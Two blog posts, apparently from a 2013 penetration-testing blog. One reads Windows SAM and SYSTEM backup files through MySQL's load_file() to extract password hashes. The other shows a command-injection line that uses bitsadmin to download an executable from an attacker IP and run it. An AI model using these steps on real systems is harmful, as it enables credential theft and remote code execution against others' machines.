Tuesday, June 25, 2013

Pulling Windows Hashes Using MySQL

Heres the setup:

-Obtain access to a MySQL database
-Database user has privileges (including File privileges)
-MySQL database is running on a windows server 2003 OS
-Cannot compile a UDF (User Defined Function) to allow command execution via MySQL, as we have no shell access, only access to the database

What do we need to do? We need to move from the database to the OS. We need to compromise Windows accounts...

How are we going to do this?

Using the help from a Chinese site, that no longer seems to be up(...weird?), and quite a bit of googling, I found a way to pull binary files (most importantly SAM and SYSTEM backup files) from the underlying OS using MySQL's built-in load_file() function.

Here are the steps:

-Convert the binary file to hex
-Pull it off the machine using the database's load_file function
-Save it to a local file
-Convert the hex back into binary
-Yank hashes out of your perfectly good SAM file
-Happy dance

First we need to verify that we have FILE privileges on the target machine:


Now lets see if the machine has the backups of the SAM and SYSTEM files. On windows XP/2003, the backup files are in C:\windows\repair\.

If you can get to these files, you will see a bunch of junk output to the screen. Once the query finishes, it will look something like this:





So what? We can load the garbled data of the binary file into mysql right? Wrong.

First we need to modify our select statement to put the file contents into hex, we will do this with mysql's hex() function:


select hex(load_file('c:/windows/repair/SAM'));


We also need to dump the results to a text file on our local system to that we can work with it. After some basic googling I made a quick python script to do this for me. You can find it here. *Note you will need to edit my script.

Now that we have our hex-encoded SAM and SYSTEM files on our attacking machine we need to convert the file contents back into binary. I found an awesome perl script to do exactly that here (thanks Dr. Herong Yang :) ).


perl hex2bin.pl SAM.txt SAM
perl hex2bin.pl SYSTEM.txt SYSTEM

We should now have a perfectly usable SAM and SYSTEM binary file. We can now try to pull the hashes with bkhive and samdump2 (there are other tools like cain, etc to do this as well)


Now pass that hash, and if the admin has been lazy, you will be able to login.


Voilà



Friday, June 7, 2013

Retrieving Elusive Command Output part 2

I can retrieve files using the same method as.... Windows Update??

In an earlier post, I described one possible way to upgrade a blind, command execution vulnerability to an interactive shell using only native windows commands. In this post I will ultimately accomplish the same goal, just in a different way using the same method that windows update uses to pull files, a tool called bitsadmin.

This is not a new idea, as it has been documented elsewhere (I think @mubix and @carnal0wnage might have mentioned it at Derbycon), but it just sparked my interest after I saw a tweet from @brutelogic, so I wanted to do a quick write up on it.

We will use the same scenario as the previous post, a vulnerable web application where we have confirmed command injection (via ping/DNS etc) but are unable to view our command output.

Once we have generated/selected the executable to be downloaded, we will need to serve it on our attacking machine.We will inject the command the same way as before:

127.0.0.1 | cmd.exe /c bitsadmin /transfer booyah http://192.168.2.105/boom.exe c:\%homepath%\boom.exe & c:\%homepath%\boom.exe

"booyah" is simply the bitsadmin job name and then we provide the command the location of the file to grab, followed by where to save the file and what to save it as. I use the %homepath% variable to be sure the user we are running as has permissions to write to the folder. We then append the command to execute the file as well.

**note that bitsadmin need a full path when you provide the location to save the file or else it will throw an error.

Once the transfer has completed, our payload executes and...



Booyah.